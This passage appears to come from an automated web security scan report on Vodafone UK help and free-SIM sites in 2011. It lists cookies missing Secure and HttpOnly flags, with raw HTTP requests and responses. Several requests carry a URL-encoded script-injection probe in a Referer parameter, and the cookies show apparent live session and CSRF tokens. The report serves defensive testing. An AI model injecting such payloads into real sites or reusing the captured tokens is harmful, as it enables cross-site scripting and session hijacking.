Cache-Control: max-age=31536000
Content-Length: 116
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:20 GMT
Accept-Ranges: bytes
ETag: "0c62b3e5bafc81:ae4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1459620106.20480.0000; path=/

function submitSideLinks(cmdName)
{
document.sidelinks1.CMD.value = cmdName;
document.sidelinks1.submit();
}

3.27. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/templateutils.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/templateutils.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/templateutils.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 7847
Content-Type: application/octet-stream
Last-Modified: Fri, 19 Aug 2011 01:11:34 GMT
Accept-Ranges: bytes
ETag: "91ec25f0c5ecc1:11f8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

/**
* Javascript functions used in all the templates
*/
// SROSBURG: Firefox not picking up the following variables from util.js,
// so redefine here
var IDENTIFIER_START = "\\{";
va
...[SNIP]...

3.28. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/usefulitemsutil.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

3.29. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 3926
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:20 GMT
Accept-Ranges: bytes
ETag: "0c62b3e5bafc81:fd8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:41 GMT
Set-Cookie: BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

function ret()
{
alert('Boolean Expression is not Valid.');
document.searchForm.boolExp.value = "";
}

function isValidBooleanExpression(str)
{
var isSpace = 0;
var newStr = "";
va
...[SNIP]...

3.30. https://help.vodafone.co.uk/system/web/widget/platform/util/util.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/widget/platform/util/util.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/widget/platform/util/util.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 20866
Content-Type: application/octet-stream
Last-Modified: Wed, 16 Nov 2011 02:11:46 GMT
Accept-Ranges: bytes
ETag: "f1f6c175a4cc1:b66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:42 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

var EGPL_USE_SUN_PLUGIN = false;
var EGPL_CLASSID = "clsid:CAFEEFAC-0016-0000-0000-ABCDEFFEDCBA";
var EGPL_CODEBASE = getWidgetDir('util') + "../../../../lib/ext/jdk_plugin/jinstall-6-windows-i586.c
...[SNIP]...

4. Cookie without HttpOnly flag set previous next
There are 43 instances of this issue:

https://freesim.vodafone.co.uk/freesim
https://freesim.vodafone.co.uk/orders/add
https://freesim.vodafone.co.uk/packages/index
http://help.vodafone.co.uk/system/selfservice.controller
https://help.vodafone.co.uk/system/selfservice.controller
http://online.vodafone.co.uk/dispatch/Portal/appmanager/vodafone/wrp
http://help.vodafone.co.uk/system/Device/Devices/home_AppleiPhone4.png
http://help.vodafone.co.uk/system/Device/Devices/home_Nokia800_2.png
http://help.vodafone.co.uk/system/Device/Devices/home_NokiaN8Black.png
http://help.vodafone.co.uk/system/Device/Devices/home_iPhone4SBlack.png
http://help.vodafone.co.uk/system/Device/Manu/topic_billing_2.png
http://help.vodafone.co.uk/system/Device/Manu/topic_email_2.png
http://help.vodafone.co.uk/system/Device/Manu/topic_joining_2.png
http://help.vodafone.co.uk/system/Device/Manu/topic_messaging_2.png
http://help.vodafone.co.uk/system/Device/Manu/topic_priceplans_2.png
http://help.vodafone.co.uk/system/Device/Manu/topic_usingphone_2.png
http://help.vodafone.co.uk/system/Device/manu/team_lee_2.png
https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/reset.css
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/articleappearance.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/browseTopic.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/commonVariables.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/main.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/misclinks.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchinpututil.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/sidelinks.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/templateutils.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js
https://help.vodafone.co.uk/system/web/widget/platform/util/util.js

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. https://freesim.vodafone.co.uk/freesim previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/freesim

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ci_session=a%3A0%3A%7B%7D; expires=Fri, 19-Nov-2010 05:00:17 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:17 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

4.2. https://freesim.vodafone.co.uk/orders/add previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/orders/add

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ci_csrf_token=914421352fdf38872d27610e72d9310e; expires=Fri, 18-Nov-2011 20:42:08 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223fd40005a122b4f5d4ab8ccc0ff9cc7e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321641728%3B%7D58e568a9ede150a6f74148acb75e1106; expires=Fri, 18-Nov-2011 19:42:08 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orders/add HTTP/1.1
Host: freesim.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.3. https://freesim.vodafone.co.uk/packages/index previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/packages/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ci_csrf_token=dd84c0b9cbdc9fee5188ae42ba617736; expires=Fri, 18-Nov-2011 21:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

4.4. http://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eGain_eService_JSESSIONID=LZC9TGqGSmnNyZtvGQGP1rVZlK5hFLnBnhzNMhq2HtTJflV1hzrh!656056821; path=/
web_templates_personalization_cookie#1058#1=topicId:9849; expires=Saturday, 17-Nov-2012 18:57:44 GMT; path=/
BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /system/selfservice.controller?CMD=BROWSE_TOPIC&PARTITION_ID=1&CONFIGURATION=1058&SIDE_LINK_TOPIC_ID=9849&TOPIC_ID=9849&TOPIC_TYPE=0&STARTING_ID=0&TOPIC_NAME=Sony%20Ericsson&PARENT_TOPIC_ID=-1&PARENT_TOPIC_TYPE=0&SOURCE_FORM=BROWSE_TOPIC HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=check#true#1321393464|session#1321393311388-20138#1321395264|PC#1321393311388-20138.19#1322603004; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20dl%3D1%7C1321644251677%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20s_invisit%3Dtrue%7C1321644252364%3B%20gpv_p32%3Dtro%253ATroubleshooting%2520-%2520Help%2520-%2520Vodafone%7C1321644252455%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20access_channel%3DOther%2520Websites%3B%20s_sq%3D%3B%20s_sv_sid%3D532231605974%3B%20s_ppv%3D65%3B

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Nov 2011 18:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: private
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: eGain_eService_JSESSIONID=LZC9TGqGSmnNyZtvGQGP1rVZlK5hFLnBnhzNMhq2HtTJflV1hzrh!656056821; path=/
Set-Cookie: web_templates_personalization_cookie#1058#1=topicId:9849; expires=Saturday, 17-Nov-2012 18:57:44 GMT; path=/
Cache-Control: private
Set-Cookie: BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 93008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

4.5. https://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

eGain_eService_JSESSIONID=h8jsTGrJZ3ClMP4SCtKpG16GKR1w2mRnvclsDtZ4vMJXWWpz0QPp!39658889; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.6. http://online.vodafone.co.uk/dispatch/Portal/appmanager/vodafone/wrp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://online.vodafone.co.uk
Path:	/dispatch/Portal/appmanager/vodafone/wrp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wrpsessionid=C73XTGkLQpGJ1QBvQwnMKcl8gnKl7rRLYvbWG7JDxqGZ2nNnNGfG!-2042610707; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /dispatch/Portal/appmanager/vodafone/wrp?_nfpb=true&_pageLabel=Page_Search_searchResult&pageID=PSE_0001 HTTP/1.1
Host: online.vodafone.co.uk
Proxy-Connection: keep-alive
Content-Length: 80
Cache-Control: max-age=0
Origin: http://mediacentre.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mediacentre.vodafone.co.uk/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

searchQuery=press+relese+contact&top-search.x=0&top-search.y=0&top-search=Search

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:30:35 GMT
Server: Apache/2.2.13 (Unix)
Cache-Control: no-cache="set-cookie"
Content-Length: 57438
Set-Cookie: wrpsessionid=C73XTGkLQpGJ1QBvQwnMKcl8gnKl7rRLYvbWG7JDxqGZ2nNnNGfG!-2042610707; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: CLUSTER=sec;Path=/
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

4.7. http://help.vodafone.co.uk/system/Device/Devices/home_AppleiPhone4.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Devices/home_AppleiPhone4.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1442842890.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Devices/home_AppleiPhone4.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 35730
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Jul 2010 11:45:29 GMT
Accept-Ranges: bytes
ETag: "507db3b5c1fcb1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1442842890.20480.0000; path=/

.PNG
.
...IHDR.............m/v ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...$IDATx.....$gu..UU.......f.V.JZ...A.."....`.`L..\.................d0 .(. ! .]m.av'......9....i...J+4.......
...
...[SNIP]...

4.8. http://help.vodafone.co.uk/system/Device/Devices/home_Nokia800_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Devices/home_Nokia800_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1459620106.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Devices/home_Nokia800_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
